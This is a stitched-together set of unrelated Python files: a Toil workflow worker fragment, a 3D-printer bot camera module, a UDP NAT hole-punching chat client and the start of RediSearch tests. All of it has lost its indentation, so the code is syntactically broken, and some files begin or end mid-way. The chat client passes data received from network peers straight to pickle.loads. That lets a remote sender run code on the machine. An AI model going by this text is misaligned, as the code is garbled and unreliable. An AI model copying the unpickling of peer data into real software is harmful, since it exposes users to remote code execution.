#This is mildly tricky because we don't just want to
#redirect stdout and stderr for this Python process; we want to redirect it
#for this process and all children. Consequently, we can't just replace
#sys.stdout and sys.stderr; we need to mess with the underlying OS-level
#file descriptors. See <http://stackoverflow.com/a/11632982/402891>
#When we start, standard input is file descriptor 0, standard output is
#file descriptor 1, and standard error is file descriptor 2.
#What file do we want to point FDs 1 and 2 to?
tempWorkerLogPath = os.path.join(localWorkerTempDir, "worker_log.txt")
if redirectOutputToLogFile:
# Save the original stdout and stderr (by opening new file descriptors
# to the same files)
origStdOut = os.dup(1)
origStdErr = os.dup(2)
# Open the file to send stdout/stderr to.
logFh = os.open(tempWorkerLogPath, os.O_WRONLY | os.O_CREAT | os.O_APPEND)
# Replace standard output with a descriptor for the log file
os.dup2(logFh, 1)
# Replace standard error with a descriptor for the log file
os.dup2(logFh, 2)
# Since we only opened the file once, all the descriptors duped from
# the original will share offset information, and won't clobber each
# others' writes. See <http://stackoverflow.com/a/5284108/402891>. This
# shouldn't matter, since O_APPEND seeks to the end of the file before
# every write, but maybe there's something odd going on...
# Close the descriptor we used to open the file
os.close(logFh)
debugging = logging.getLogger().isEnabledFor(logging.DEBUG)
##########################################
#Worker log file trapped from here on in
##########################################
workerFailed = False
statsDict = MagicExpando()
statsDict.jobs = []
statsDict.workers.logsToMaster = []
blockFn = lambda : True
listOfJobs = [jobName]
try:
#Put a message at the top of the log, just to make sure it's working.
logger.info("---TOIL WORKER OUTPUT LOG---")
sys.stdout.flush()
logProcessContext(config)
##########################################
#Load the jobGraph
##########################################
jobGraph = jobStore.load(jobStoreID)
listOfJobs[0] = str(jobGraph)
logger.debug("Parsed job wrapper")
##########################################
#Cleanup from any earlier invocation of the jobGraph
##########################################
if jobGraph.command == None:
logger.debug("Wrapper has no user job to run.")
# Cleanup jobs already finished
f = lambda jobs : [z for z in [[y for y in x if jobStore.exists(y.jobStoreID)] for x in jobs] if len(z) > 0]
jobGraph.stack = f(jobGraph.stack)
jobGraph.services = f(jobGraph.services)
logger.debug("Cleaned up any references to completed successor jobs")
#This cleans the old log file which may
#have been left if the job is being retried after a job failure.
oldLogFile = jobGraph.logJobStoreFileID
if oldLogFile != None:
jobGraph.logJobStoreFileID = None
jobStore.update(jobGraph) #Update first, before deleting any files
jobStore.deleteFile(oldLogFile)
##########################################
# If a checkpoint exists, restart from the checkpoint
##########################################
# The job is a checkpoint, and is being restarted after previously completing
if jobGraph.checkpoint != None:
logger.debug("Job is a checkpoint")
# If the checkpoint still has extant jobs in its
# (flattened) stack and services, its subtree didn't
# complete properly. We handle the restart of the
# checkpoint here, removing its previous subtree.
if len([i for l in jobGraph.stack for i in l]) > 0 or len(jobGraph.services) > 0:
logger.debug("Checkpoint has failed.")
# Reduce the retry count
assert jobGraph.remainingRetryCount >= 0
jobGraph.remainingRetryCount = max(0, jobGraph.remainingRetryCount - 1)
jobGraph.restartCheckpoint(jobStore)
# Otherwise, the job and successors are done, and we can cleanup stuff we couldn't clean
# because of the job being a checkpoint
else:
logger.debug("The checkpoint jobs seems to have completed okay, removing any checkpoint files to delete.")
#Delete any remnant files
list(map(jobStore.deleteFile, list(filter(jobStore.fileExists, jobGraph.checkpointFilesToDelete))))
##########################################
#Setup the stats, if requested
##########################################
if config.stats:
startClock = getTotalCpuTime()
startTime = time.time()
while True:
##########################################
#Run the jobGraph, if there is one
##########################################
if jobGraph.command is not None:
assert jobGraph.command.startswith( "_toil " )
logger.debug("Got a command to run: %s" % jobGraph.command)
#Load the job
job = Job._loadJob(jobGraph.command, jobStore)
# If it is a checkpoint job, save the command
if job.checkpoint:
jobGraph.checkpoint = jobGraph.command
# Create a fileStore object for the job
fileStore = FileStore.createFileStore(jobStore, jobGraph, localWorkerTempDir, blockFn,
caching=not config.disableCaching)
with job._executor(jobGraph=jobGraph,
stats=statsDict if config.stats else None,
fileStore=fileStore):
with fileStore.open(job):
# Get the next block function and list that will contain any messages
blockFn = fileStore._blockFn
job._runner(jobGraph=jobGraph, jobStore=jobStore, fileStore=fileStore)
# Accumulate messages from this job & any subsequent chained jobs
statsDict.workers.logsToMaster += fileStore.loggingMessages
else:
#The command may be none, in which case
#the jobGraph is either a shell ready to be deleted or has
#been scheduled after a failure to cleanup
logger.debug("No user job to run, so finishing")
break
if FileStore._terminateEvent.isSet():
raise RuntimeError("The termination flag is set")
##########################################
#Establish if we can run another jobGraph within the worker
##########################################
successorJobGraph = nextChainableJobGraph(jobGraph, jobStore)
if successorJobGraph is None or config.disableChaining:
# Can't chain any more jobs.
break
##########################################
#We have a single successor job that is not a checkpoint job.
#We transplant the successor jobGraph command and stack
#into the current jobGraph object so that it can be run
#as if it were a command that were part of the current jobGraph.
#We can then delete the successor jobGraph in the jobStore, as it is
#wholly incorporated into the current jobGraph.
##########################################
# add the successor to the list of jobs run
listOfJobs.append(str(successorJobGraph))
#Clone the jobGraph and its stack
jobGraph = copy.deepcopy(jobGraph)
#Remove the successor jobGraph
jobGraph.stack.pop()
#Transplant the command and stack to the current jobGraph
jobGraph.command = successorJobGraph.command
jobGraph.stack += successorJobGraph.stack
# include some attributes for better identification of chained jobs in
# logging output
jobGraph.unitName = successorJobGraph.unitName
jobGraph.jobName = successorJobGraph.jobName
assert jobGraph.memory >= successorJobGraph.memory
assert jobGraph.cores >= successorJobGraph.cores
#Build a fileStore to update the job
fileStore = FileStore.createFileStore(jobStore, jobGraph, localWorkerTempDir, blockFn,
caching=not config.disableCaching)
#Update blockFn
blockFn = fileStore._blockFn
#Add successorJobGraph to those to be deleted
fileStore.jobsToDelete.add(successorJobGraph.jobStoreID)
#This will update the job once the previous job is done
fileStore._updateJobWhenDone()
#Clone the jobGraph and its stack again, so that updates to it do
#not interfere with this update
jobGraph = copy.deepcopy(jobGraph)
logger.debug("Starting the next job")
##########################################
#Finish up the stats
##########################################
if config.stats:
totalCPUTime, totalMemoryUsage = getTotalCpuTimeAndMemoryUsage()
statsDict.workers.time = str(time.time() - startTime)
statsDict.workers.clock = str(totalCPUTime - startClock)
statsDict.workers.memory = str(totalMemoryUsage)
# log the worker log path here so that if the file is truncated the path can still be found
if redirectOutputToLogFile:
logger.info("Worker log can be found at %s. Set --cleanWorkDir to retain this log", localWorkerTempDir)
logger.info("Finished running the chain of jobs on this node, we ran for a total of %f seconds", time.time() - startTime)
##########################################
#Trapping where worker goes wrong
##########################################
except: #Case that something goes wrong in worker
traceback.print_exc()
logger.error("Exiting the worker because of a failed job on host %s", socket.gethostname())
FileStore._terminateEvent.set()
##########################################
#Wait for the asynchronous chain of writes/updates to finish
##########################################
blockFn()
##########################################
#All the asynchronous worker/update threads must be finished now,
#so safe to test if they completed okay
##########################################
if FileStore._terminateEvent.isSet():
jobGraph = jobStore.load(jobStoreID)
jobGraph.setupJobAfterFailure(config)
workerFailed = True
##########################################
#Cleanup
##########################################
# Close the worker logging
# Flush at the Python level
sys.stdout.flush()
sys.stderr.flush()
if redirectOutputToLogFile:
# Flush at the OS level
os.fsync(1)
os.fsync(2)
# Close redirected stdout and replace with the original standard output.
os.dup2(origStdOut, 1)
# Close redirected stderr and replace with the original standard error.
os.dup2(origStdErr, 2)
# sys.stdout and sys.stderr don't need to be modified at all. We don't
# need to call redirectLoggerStreamHandlers since they still log to
# sys.stderr
# Close our extra handles to the original standard output and standard
# error streams, so we don't leak file handles.
os.close(origStdOut)
os.close(origStdErr)
# Now our file handles are in exactly the state they were in before.
#Copy back the log file to the global dir, if needed
if workerFailed:
jobGraph.logJobStoreFileID = jobStore.getEmptyFileStoreID(jobGraph.jobStoreID)
jobGraph.chainedJobs = listOfJobs
with jobStore.updateFileStream(jobGraph.logJobStoreFileID) as w:
with open(tempWorkerLogPath, "r") as f:
if os.path.getsize(tempWorkerLogPath) > logFileByteReportLimit != 0:
if logFileByteReportLimit > 0:
f.seek(-logFileByteReportLimit, 2) # seek to last tooBig bytes of file
elif logFileByteReportLimit < 0:
f.seek(logFileByteReportLimit, 0) # seek to first tooBig bytes of file
w.write(f.read().encode('utf-8')) # TODO load file using a buffer
jobStore.update(jobGraph)
elif debugging and redirectOutputToLogFile: # write log messages
with open(tempWorkerLogPath, 'r') as logFile:
if os.path.getsize(tempWorkerLogPath) > logFileByteReportLimit != 0:
if logFileByteReportLimit > 0:
logFile.seek(-logFileByteReportLimit, 2) # seek to last tooBig bytes of file
elif logFileByteReportLimit < 0:
logFile.seek(logFileByteReportLimit, 0) # seek to first tooBig bytes of file
logMessages = logFile.read().splitlines()
statsDict.logs.names = listOfJobs
statsDict.logs.messages = logMessages
if (debugging or config.stats or statsDict.workers.logsToMaster) and not workerFailed: # We have stats/logging to report back
jobStore.writeStatsAndLogging(json.dumps(statsDict, ensure_ascii=True))
#Remove the temp dir
cleanUp = config.cleanWorkDir
if cleanUp == 'always' or (cleanUp == 'onSuccess' and not workerFailed) or (cleanUp == 'onError' and workerFailed):
shutil.rmtree(localWorkerTempDir)
#This must happen after the log file is done with, else there is no place to put the log
if (not workerFailed) and jobGraph.command == None and len(jobGraph.stack) == 0 and len(jobGraph.services) == 0:
# We can now safely get rid of the jobGraph
jobStore.delete(jobGraph.jobStoreID)
def main(argv=None):
if argv is None:
argv = sys.argv
# Parse input args
jobName = argv[1]
jobStoreLocator = argv[2]
jobStoreID = argv[3]
##########################################
#Load the jobStore/config file
##########################################
# Try to monkey-patch boto early so that credentials are cached.
try:
import boto
except ImportError:
pass
else:
# boto is installed, monkey patch it now
from toil.lib.ec2Credentials import enable_metadata_credential_caching
enable_metadata_credential_caching()
jobStore = Toil.resumeJobStore(jobStoreLocator)
config = jobStore.config
# Call the worker
workerScript(jobStore, config, jobName, jobStoreID)
|
camera.py
|
import configparser
import logging
import math
import os
import pathlib
import threading
import time
import glob
from contextlib import contextmanager
from functools import wraps
from io import BytesIO
from pathlib import Path
from queue import Queue
from typing import List
import cv2
from PIL import Image, _webp
from telegram import Message
from configuration import ConfigWrapper
from klippy import Klippy
from power_device import PowerDevice
logger = logging.getLogger(__name__)
def cam_light_toggle(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
self.use_light()
if self.light_timeout > 0 and self.light_device and not self.light_device.device_state and not self.light_lock.locked():
self.light_timer_event.clear()
self.light_lock.acquire()
self.light_need_off = True
self.light_device.switch_device(True)
time.sleep(self.light_timeout)
self.light_timer_event.set()
self.light_timer_event.wait()
# Todo: maybe add try block?
result = func(self, *args, **kwargs)
self.free_light()
def delayed_light_off():
if self.light_requests == 0:
if self.light_lock.locked():
self.light_lock.release()
self.light_need_off = False
self.light_device.switch_device(False)
else:
logger.debug(f"light requests count: {self.light_requests}")
if self.light_need_off and self.light_requests == 0:
threading.Timer(1.5, delayed_light_off).start()
return result
return wrapper
class Camera:
def __init__(self, config: ConfigWrapper, klippy: Klippy, light_device: PowerDevice, logging_handler: logging.Handler = None):
self.enabled: bool = config.camera.enabled
self._host = int(config.camera.host) if str.isdigit(config.camera.host) else config.camera.host
self._threads: int = config.camera.threads
self._flip_vertically: bool = config.camera.flip_vertically
self._flip_horizontally: bool = config.camera.flip_horizontally
self._fourcc: str = config.camera.fourcc
self._video_duration: int = config.camera.video_duration
self._video_buffer_size: int = config.camera.video_buffer_size
self._stream_fps: int = config.camera.stream_fps
self._klippy: Klippy = klippy
# Todo: refactor into timelapse class
self._base_dir: str = config.timelapse.base_dir
self._ready_dir: str = config.timelapse.ready_dir
self._cleanup: bool = config.timelapse.cleanup
self._target_fps: int = 15
self._min_lapse_duration: int = 0
self._max_lapse_duration: int = 0
self._last_frame_duration: int = 5
self._light_need_off: bool = False
self._light_need_off_lock = threading.Lock()
self.light_timeout: int = config.camera.light_timeout
self.light_device: PowerDevice = light_device
self._camera_lock = threading.Lock()
self.light_lock = threading.Lock()
self.light_timer_event = threading.Event()
self.light_timer_event.set()
self._hw_accel: bool = False
if config.camera.picture_quality == 'low':
self._img_extension: str = 'jpeg'
elif config.camera.picture_quality == 'high':
self._img_extension: str = 'webp'
else:
self._img_extension: str = config.camera.picture_quality
self._light_requests: int = 0
self._light_request_lock = threading.Lock()
if self._flip_vertically and self._flip_horizontally:
self._flip = -1
elif self._flip_horizontally:
self._flip = 1
elif self._flip_vertically:
self._flip = 0
if config.camera.rotate == '90_cw':
self._rotate_code: int = cv2.ROTATE_90_CLOCKWISE
elif config.camera.rotate == '90_ccw':
self._rotate_code: int = cv2.ROTATE_90_COUNTERCLOCKWISE
elif config.camera.rotate == '180':
self._rotate_code: int = cv2.ROTATE_180
else:
self._rotate_code: int = -10
if logging_handler:
logger.addHandler(logging_handler)
if config.bot.debug:
logger.setLevel(logging.DEBUG)
logger.debug(cv2.getBuildInformation())
os.environ["OPENCV_VIDEOIO_DEBUG"] = "1"
# Fixme: deprecated! use T-API https://learnopencv.com/opencv-transparent-api/
if cv2.ocl.haveOpenCL():
logger.debug('OpenCL is available')
cv2.ocl.setUseOpenCL(True)
logger.debug(f'OpenCL in OpenCV is enabled: {cv2.ocl.useOpenCL()}')
cv2.setNumThreads(self._threads)
self.cam_cam = cv2.VideoCapture()
self.cam_cam.set(cv2.CAP_PROP_BUFFERSIZE, 1)
@property
def light_need_off(self) -> bool:
with self._light_need_off_lock:
return self._light_need_off
@light_need_off.setter
def light_need_off(self, new_value: bool):
with self._light_need_off_lock:
self._light_need_off = new_value
@property
def lapse_dir(self) -> str:
return f'{self._base_dir}/{self._klippy.printing_filename_with_time}'
@property
def light_requests(self) -> int:
with self._light_request_lock:
return self._light_requests
def use_light(self):
with self._light_request_lock:
self._light_requests += 1
def free_light(self):
with self._light_request_lock:
self._light_requests -= 1
@property
def target_fps(self) -> int:
return self._target_fps
@target_fps.setter
def target_fps(self, new_value: int):
self._target_fps = new_value
@property
def min_lapse_duration(self) -> int:
return self._min_lapse_duration
@min_lapse_duration.setter
def min_lapse_duration(self, new_value: int):
if new_value >= 0:
self._min_lapse_duration = new_value
@property
def max_lapse_duration(self) -> int:
return self._max_lapse_duration
@max_lapse_duration.setter
def max_lapse_duration(self, new_value: int):
if new_value >= 0:
self._max_lapse_duration = new_value
@property
def last_frame_duration(self) -> int:
return self._last_frame_duration
@last_frame_duration.setter
def last_frame_duration(self, new_value: int):
if new_value >= 0:
self._last_frame_duration = new_value
@staticmethod
def _create_thumb(image) -> BytesIO:
# cv2.cvtColor cause segfaults!
img = Image.fromarray(image[:, :, [2, 1, 0]])
bio = BytesIO()
bio.name = 'thumbnail.jpeg'
img.thumbnail((320, 320))
img.save(bio, 'JPEG', quality=100, optimize=True)
bio.seek(0)
img.close()
del img
return bio
@cam_light_toggle
def take_photo(self) -> BytesIO:
with self._camera_lock:
self.cam_cam.open(self._host)
self.cam_cam.set(cv2.CAP_PROP_BUFFERSIZE, 1)
success, image = self.cam_cam.read()
self.cam_cam.release()
if not success:
logger.debug("failed to get camera frame for photo")
# Todo: resize to cam resolution!
img = Image.open('../imgs/nosignal.png')
else:
if self._hw_accel:
image_um = cv2.UMat(image)
if self._flip_vertically or self._flip_horizontally:
image_um = cv2.flip(image_um, self._flip)
img = Image.fromarray(cv2.UMat.get(cv2.cvtColor(image_um, cv2.COLOR_BGR2RGB)))
image_um = None
del image_um
else:
if self._flip_vertically or self._flip_horizontally:
image = cv2.flip(image, self._flip)
# Todo: check memory leaks
if self._rotate_code > -10:
image = cv2.rotate(image, rotateCode=self._rotate_code)
# # cv2.cvtColor cause segfaults!
# rgb = image[:, :, ::-1]
rgb = image[:, :, [2, 1, 0]]
img = Image.fromarray(rgb)
rgb = None
del rgb
image = None
del image, success
bio = BytesIO()
bio.name = f'status.{self._img_extension}'
if self._img_extension in ['jpg', 'jpeg']:
img.save(bio, 'JPEG', quality=80, subsampling=0)
elif self._img_extension == 'webp':
# https://github.com/python-pillow/Pillow/issues/4364
_webp.HAVE_WEBPANIM = False
img.save(bio, 'WebP', quality=0, lossless=True)
elif self._img_extension == 'png':
img.save(bio, 'PNG')
bio.seek(0)
img.close()
del img
return bio
@contextmanager
def take_video_generator(self):
(video_bio, thumb_bio, width, height) = self.take_video()
try:
yield video_bio, thumb_bio, width, height
finally:
video_bio.close()
thumb_bio.close()
@cam_light_toggle
def take_video(self) -> (BytesIO, BytesIO, int, int):
def process_video_frame(frame_local):
if self._flip_vertically or self._flip_horizontally:
if self._hw_accel:
frame_loc_ = cv2.UMat(frame_local)
frame_loc_ = cv2.flip(frame_loc_, self._flip)
frame_local = cv2.UMat.get(frame_loc_)
del frame_loc_
else:
frame_local = cv2.flip(frame_local, self._flip)
# Todo: check memory leaks
if self._rotate_code > -10:
frame_local = cv2.rotate(frame_local, rotateCode=self._rotate_code)
return frame_local
def write_video():
cv2.setNumThreads(self._threads)
out = cv2.VideoWriter(filepath, fourcc=cv2.VideoWriter_fourcc(*self._fourcc), fps=fps_cam, frameSize=(width, height))
while video_lock.locked():
try:
frame_local = frame_queue.get(block=False)
except Exception as ex:
logger.warning(f'Reading video frames queue exception: {ex}')
frame_local = frame_queue.get()
out.write(process_video_frame(frame_local))
# frame_local = None
# del frame_local
while not frame_queue.empty():
frame_local = frame_queue.get()
out.write(process_video_frame(frame_local))
# frame_local = None
# del frame_local
out.release()
video_written_event.set()
with self._camera_lock:
cv2.setNumThreads(self._threads) # TOdo: check self set and remove!
self.cam_cam.open(self._host)
self.cam_cam.set(cv2.CAP_PROP_BUFFERSIZE, 1)
success, frame = self.cam_cam.read()
if not success:
logger.debug("failed to get camera frame for video")
# Todo: get picture from imgs?
frame = process_video_frame(frame)
height, width, channels = frame.shape
thumb_bio = self._create_thumb(frame)
del frame, channels
fps_cam = self.cam_cam.get(cv2.CAP_PROP_FPS) if self._stream_fps == 0 else self._stream_fps
filepath = os.path.join('/tmp/', 'video.mp4')
frame_queue = Queue(fps_cam * self._video_buffer_size)
video_lock = threading.Lock()
video_written_event = threading.Event()
video_written_event.clear()
video_lock.acquire()
threading.Thread(target=write_video, args=()).start()
t_end = time.time() + self._video_duration
while success and time.time() <= t_end:
success, frame_loc = self.cam_cam.read()
try:
frame_queue.put(frame_loc, block=False)
except Exception as ex:
logger.warning(f'Writing video frames queue exception: {ex}')
frame_queue.put(frame_loc)
# frame_loc = None
# del frame_loc
video_lock.release()
video_written_event.wait()
self.cam_cam.release()
video_bio = BytesIO()
video_bio.name = 'video.mp4'
with open(filepath, 'rb') as fh:
video_bio.write(fh.read())
os.remove(filepath)
video_bio.seek(0)
return video_bio, thumb_bio, width, height
def take_lapse_photo(self) -> None:
# Todo: check for space available?
Path(self.lapse_dir).mkdir(parents=True, exist_ok=True)
# never add self in params there!
with self.take_photo() as photo:
filename = f'{self.lapse_dir}/{time.time()}.{self._img_extension}'
with open(filename, "wb") as outfile:
outfile.write(photo.getvalue())
photo.close()
def create_timelapse(self, printing_filename: str, gcode_name: str, info_mess: Message) -> (BytesIO, BytesIO, int, int, str, str):
return self._create_timelapse(printing_filename, gcode_name, info_mess)
def create_timelapse_for_file(self, filename: str, info_mess: Message) -> (BytesIO, BytesIO, int, int, str, str):
return self._create_timelapse(filename, filename, info_mess)
def _calculate_fps(self, frames_count: int) -> int:
actual_duration = frames_count / self._target_fps
# Todo: check _max_lapse_duration > _min_lapse_duration
if (self._min_lapse_duration == 0 and self._max_lapse_duration == 0) or (self._min_lapse_duration <= actual_duration <= self._max_lapse_duration and self._max_lapse_duration > 0):
return self._target_fps
elif actual_duration < self._min_lapse_duration and self._min_lapse_duration > 0:
fps = math.ceil(frames_count / self._min_lapse_duration)
return fps if fps >= 1 else 1
elif actual_duration > self._max_lapse_duration > 0:
return math.ceil(frames_count / self._max_lapse_duration)
else:
# Fall back to the target fps so the caller never receives None
return self._target_fps
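# Worked example (illustrative, not from the original file): with
# _target_fps=15, _min_lapse_duration=10 and _max_lapse_duration=0,
# 60 frames give an actual duration of 60/15 = 4 s, which is below the
# 10 s minimum, so the fps is lowered to ceil(60/10) = 6 to stretch the
# timelapse to the requested minimum length.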
def _create_timelapse(self, printing_filename: str, gcode_name: str, info_mess: Message) -> (BytesIO, BytesIO, int, int, str, str):
while self.light_need_off:
time.sleep(1)
lapse_dir = f'{self._base_dir}/{printing_filename}'
if not Path(f'{lapse_dir}/lapse.lock').is_file():
open(f'{lapse_dir}/lapse.lock', mode='a').close()
# Todo: check for nonempty photos!
photos = glob.glob(f'{glob.escape(lapse_dir)}/*.{self._img_extension}')
photos.sort(key=os.path.getmtime)
photo_count = len(photos)
info_mess.edit_text(text=f"Creating thumbnail")
last_photo = photos[-1]
img = cv2.imread(last_photo)
height, width, layers = img.shape
thumb_bio = self._create_thumb(img)
video_filepath = f'{lapse_dir}/{printing_filename}.mp4'
if Path(video_filepath).is_file():
os.remove(video_filepath)
lapse_fps = self._calculate_fps(photo_count)
with self._camera_lock:
cv2.setNumThreads(self._threads) # TOdo: check self set and remove!
out = cv2.VideoWriter(video_filepath, fourcc=cv2.VideoWriter_fourcc(*self._fourcc), fps=lapse_fps, frameSize=(width, height))
info_mess.edit_text(text=f"Images recoding")
last_update_time = time.time()
for fnum, filename in enumerate(photos):
if time.time() >= last_update_time + 3:
info_mess.edit_text(text=f"Images recoded {fnum}/{photo_count}")
last_update_time = time.time()
out.write(cv2.imread(filename))
info_mess.edit_text(text=f"Repeating last image for {self._last_frame_duration} seconds")
for _ in range(lapse_fps * self._last_frame_duration):
out.write(img)
out.release()
cv2.destroyAllWindows()
del out
del photos, img, layers
# Todo: some error handling?
video_bio = BytesIO()
video_bio.name = f'{printing_filename}.mp4'
with open(video_filepath, 'rb') as fh:
video_bio.write(fh.read())
if self._ready_dir and os.path.isdir(self._ready_dir):
info_mess.edit_text(text=f"Copy lapse to target ditectory")
with open(f"{self._ready_dir}/{printing_filename}.mp4", 'wb') as cpf:
cpf.write(video_bio.getvalue())
video_bio.seek(0)
os.remove(f'{lapse_dir}/lapse.lock')
if self._cleanup:
info_mess.edit_text(text=f"Performing cleanups")
for filename in glob.glob(f'{glob.escape(lapse_dir)}/*.{self._img_extension}'):
os.remove(filename)
if video_bio.getbuffer().nbytes < 52428800:
for filename in glob.glob(f'{glob.escape(lapse_dir)}/*'):
os.remove(filename)
Path(lapse_dir).rmdir()
return video_bio, thumb_bio, width, height, video_filepath, gcode_name
def clean(self) -> None:
if self._cleanup and self._klippy.printing_filename and os.path.isdir(self.lapse_dir):
for filename in glob.glob(f'{glob.escape(self.lapse_dir)}/*'):
os.remove(filename)
# Todo: refactor into timelapse class
# Todo: check for 64 symbols length in lapse names
def detect_unfinished_lapses(self) -> List[str]:
# Todo: detect unstarted timelapse builds? folder with pics and no mp4 files
return list(map(lambda el: pathlib.PurePath(el).parent.name, glob.glob(f'{self._base_dir}/*/*.lock')))
|
client.py
|
#!/usr/bin/env python
# coding:utf-8
import os
import pickle
import socket
import sys
import time
from threading import Event, Thread
from typing import Tuple, List
from psy import network
from psy.client.message import Message
from psy.client.config import bus
from psy.client.config import logging
class Client:
master: Tuple[str, int]
pool: str
periodic_running: bool
peer_nat_type: str
messages: List[Message]
def __init__(self, master_ip: str, port: int, pool: str, messages: List) -> None:
self.master = (master_ip, port)
self.pool = pool.strip()
self.sockfd = self.target = None
self.periodic_running = False
self.peer_nat_type = None
self.messages = messages
def request_for_connection(self, nat_type_id=0):
self.sockfd: socket.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sockfd.sendto(bytes(self.pool + ' {0}'.format(nat_type_id), 'utf-8'), self.master)
data, addr = self.sockfd.recvfrom(len(self.pool) + 3)
data = data.decode('utf-8')
if data != "ok " + self.pool:
logging.warn("unable to request!")
sys.exit(1)
self.sockfd.sendto(bytes("ok", 'utf-8'), self.master)
logging.info("request sent, waiting for partner in pool '%s'..." % self.pool)
data, addr = self.sockfd.recvfrom(8)
self.target, peer_nat_type_id = network.bytes2address(data)
logging.info(str(self.target) + " " + str(peer_nat_type_id))
self.peer_nat_type = network.NATTYPE[peer_nat_type_id]
logging.info("connected to {1}:{2}, its NAT type is {0}".format(self.peer_nat_type, *self.target))
def recv_msg(self, sock, is_restrict=False, event=None):
if is_restrict:
while True:
data, addr = sock.recvfrom(1024)
if self.periodic_running:
logging.info("periodic_send is alive")
self.periodic_running = False
event.set()
logging.info("received msg from target,", "periodic send cancelled, chat start.")
if addr == self.target or addr == self.master:
message = pickle.loads(data)
self.messages.append(message)
bus.emit('client:messages:received', message)
if data == "punching...\n":
sock.sendto("end punching\n", addr)
else:
while True:
data, addr = sock.recvfrom(1024)
if addr == self.target or addr == self.master:
message = pickle.loads(data)
self.messages.append(message)
bus.emit('client:messages:received', message)
if data == "punching...\n": # peer是restrict
sock.sendto("end punching", addr)
def send_msg(self, sock):
while True:
if len(self.messages) > 0:
messages = self.get_messages_to_send()
if len(messages):
for message in messages:
message.was_sent = True
bus.emit('client:messages:sent', message)
sock.sendto(pickle.dumps(message), self.target)
def get_messages_to_send(self):
to_send: List = []
for message in self.messages:
if not message.was_sent:
to_send.append(message)
return to_send
@staticmethod
def start_working_threads(send, recv, event=None, *args, **kwargs):
ts = Thread(target=send, args=args, kwargs=kwargs)
ts.setDaemon(True)
ts.start()
if event:
event.wait()
tr = Thread(target=recv, args=args, kwargs=kwargs)
tr.setDaemon(True)
tr.start()
def chat_fullcone(self):
self.start_working_threads(self.send_msg, self.recv_msg, None, self.sockfd)
def chat_restrict(self):
from threading import Timer
cancel_event = Event()
def send(count):
self.sockfd.sendto(bytes('punching...\n', 'utf-8'), self.target)
logging.info("UDP punching package {0} sent".format(count))
if self.periodic_running:
Timer(0.5, send, args=(count + 1,)).start()
self.periodic_running = True
send(0)
kwargs = {'is_restrict': True, 'event': cancel_event}
self.start_working_threads(self.send_msg, self.recv_msg, cancel_event,
self.sockfd, **kwargs)
def chat_symmetric(self):
"""
Completely rely on relay server(TURN)
"""
def send_msg_symm(sock):
# todo switch to message list
while True:
data = 'msg ' + sys.stdin.readline()
sock.sendto(bytes(data, 'utf-8'), self.master)
def recv_msg_symm(sock):
while True:
data, addr = sock.recvfrom(1024)
if addr == self.master:
self.messages.append(data.decode('utf-8'))
self.start_working_threads(send_msg_symm, recv_msg_symm, None,
self.sockfd)
def main(self, test_nat_type=None):
"""
nat_type is our own NAT type; peer_nat_type is the peer's NAT type obtained from the server.
The chat mode is chosen from nat_type. For example, if our NAT device is of the restrict type,
we must keep sending packets to the peer so that our NAT recognises the peer as an address we
have already sent to; the periodic sending stops once a packet is received from the peer.
"""
if not test_nat_type:
nat_type, _, _ = network.get_nat_type()
else:
nat_type = test_nat_type # pretend we are testing a specific NAT type
try:
self.request_for_connection(nat_type_id=network.NATTYPE.index(nat_type))
except ValueError:
logging.error("NAT type is %s" % nat_type)
self.request_for_connection(nat_type_id=4) # Unknown NAT
if nat_type == network.UnknownNAT or self.peer_nat_type == network.UnknownNAT:
logging.info("Symmetric chat mode")
self.chat_symmetric()
elif nat_type == network.SymmetricNAT or self.peer_nat_type == network.SymmetricNAT:
logging.info("Symmetric chat mode")
self.chat_symmetric()
elif nat_type == network.FullCone:
logging.info("FullCone chat mode")
self.chat_fullcone()
elif nat_type in (network.RestrictNAT, network.RestrictPortNAT):
logging.info("Restrict chat mode")
self.chat_restrict()
else:
logging.error("NAT type wrong!")
while True:
try:
time.sleep(0.5)
except KeyboardInterrupt:
logging.info("exit")
sys.exit(0)
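# Hypothetical usage sketch (not part of the original module); the rendezvous
# server address, port and pool name below are placeholders.
if __name__ == '__main__':
    client = Client(master_ip='203.0.113.10', port=8000, pool='demo-pool', messages=[])
    client.main()  # contacts the rendezvous server, punches through NAT and starts the chat threads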
|
test.py
|
# -*- coding: utf-8 -*-
import redis
import unittest
from hotels import hotels
import random
import time
from RLTest import Env
def testAdd(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
env.assertTrue(r.exists('idx:idx'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
for _ in r.retry_with_rdb_reload():
prefix = 'ft'
env.assertExists(prefix + ':idx/hello')
env.assertExists(prefix + ':idx/world')
env.assertExists(prefix + ':idx/lorem')
def testConditionalUpdate(env):
env.assertOk(env.cmd(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1',
'fields', 'foo', 'hello', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '1 == 2', 'fields', 'foo', 'world', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'partial', 'if',
'@foo == "world"', 'fields', 'bar', '234'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@bar == 234', 'fields', 'foo', 'hello', 'bar', '123'))
# Ensure that conditionals are ignored if the document doesn't exist
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails if we try again, because it already exists
env.assertEqual('NOADD', env.cmd('FT.ADD', 'idx', '666', '1',
'REPLACE', 'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails because we're not using 'REPLACE'
with env.assertResponseError():
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
def testUnionIdList(env):
# Regression test for https://github.com/RediSearch/RediSearch/issues/306
r = env
N = 100
